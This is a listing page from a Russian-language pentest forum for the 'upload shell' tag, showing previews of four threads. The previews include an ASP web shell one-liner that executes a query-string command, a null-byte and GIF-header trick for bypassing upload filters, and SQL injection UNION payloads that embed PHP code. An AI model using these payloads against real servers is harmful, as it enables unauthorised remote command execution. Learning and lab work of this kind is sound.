-
Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
upload shell
-
Ошибка при загрузки оболочки asp
Привет) пытаюсь загрузить оболочку но сервер выдает ошибку по началу сервер не давал закидавать .asp файл file.asp <%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> потом я это обошел так: file.asp%00.jpg GIF89a; <%response.write...- Frintezza
- Тема
- asp.net bypass hacking pentest upload shell
- Ответы: 4
- Раздел: Вопрос - Ответ
-
CTF HackTheBox CTF "Magic" разбор Web-Linux (Уровень: Средний)
You must be registered for see element. Привет Форумчане! Продолжаем рассматривать CTF с площадки HackTheBox, одна из таких интересных коробок по Linux будет разобрана в этой статье, не буду томить... Начнём! Данные: Задача: Скомпрометировать машину на Linux и взять два флага user.txt и...- QuietMoth1
- Тема
- arbitrary file ctf ctf writeup linux ctf quietmoth1 sql sql injection sql иньекции upload shell
- Ответы: 4
- Раздел: CTF Codeby Games и другие
-
Заметка Lotus Domino Upload File AJAX и %%File
Помимо описанного в интернетах для AJAX загрузки файла на Domino сервер, нашел нигде не описанную вещь с formData.append('%%File', file )! Пример <form id="UploadFile"> <p><input type="file" id='File1' name="%%File.1" /></p> </form> с этой формы собираем данные var formData = new FormData( $(...- NetWood
- Тема
- ajax file upload shell web
- Ответы: 0
- Раздел: Lotus - classic web
-
F
В sql injection не запускается php script
В sql injection не запускается php script (-12 union all select 1,0x3c3f70687020706870696e666f28293a3f3e,3,4,5-- -) (-12 union all select 1,<?php phpinfo();?>,3,4,5-- -). Пользователь root@localhost, есть доступ к чтению и запись. на странице не отображается результат, если посмотреть исходный...- farrukh
- Тема
- php script sql injection upload shell
- Ответы: 13
- Раздел: Вопрос - Ответ